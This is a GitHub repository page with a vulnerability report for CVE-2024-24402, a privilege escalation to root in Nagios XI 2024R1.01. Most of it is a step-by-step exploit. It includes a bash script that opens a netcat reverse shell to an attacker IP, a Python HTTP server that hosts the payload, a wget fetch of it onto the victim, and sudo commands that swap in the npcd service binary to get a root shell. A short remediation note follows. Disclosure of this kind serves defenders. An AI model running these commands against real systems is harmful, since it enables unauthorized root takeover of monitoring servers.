Skip to content

MAWK0235/CVE-2024-24402

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 

Repository files navigation

Vulnerability Report

CVE Disovered by: Jarod Jaslow (MAWK)

Vulnerability Details:

  • Endpoint: Nagios XI Version 2024R1.01
  • Vulnerability Type: Privilege Escalation from User "NAGIOS"
  • Exploitation Result: Full root access on the target system

Steps to Reproduce:

1. Create a Fresh Instance of Nagios XI Version 2024R1.01:

2. Abuse Privilege Escalation:

  • As the user "NAGIOS," create a file on the attacker machine with the following content:

    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445

Pasted image 20240118113554

  • Host the file on the attacker machine via a Python HTTP server:

    python3 -m http.server 8000

Pasted image 20240118173813

  • Start a Netcat (NC) listening server on the attacker machine:

    nc -nlvp 4445

Pasted image 20240118173831

3. Execute the Exploitation on the Victim Computer:

  • Fetch the file from the attacker machine:

    wget http://<Attacker IP>:8000/npcd

Pasted image 20240118173846

  • Execute the following commands to escalate privileges and receive a connection as root:

    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd

Pasted image 20240118173857

Pasted image 20240118173915

Recommendation:

It is recommended to restrict the ability of the user "NAGIOS" to write to Nagios service executables that are run as root. This can be achieved by implementing stricter file permissions and access controls for the relevant directories and files associated with Nagios services.

This should be fixed in new releases

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

About

Priv esc in Nagios 2024R1.01

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published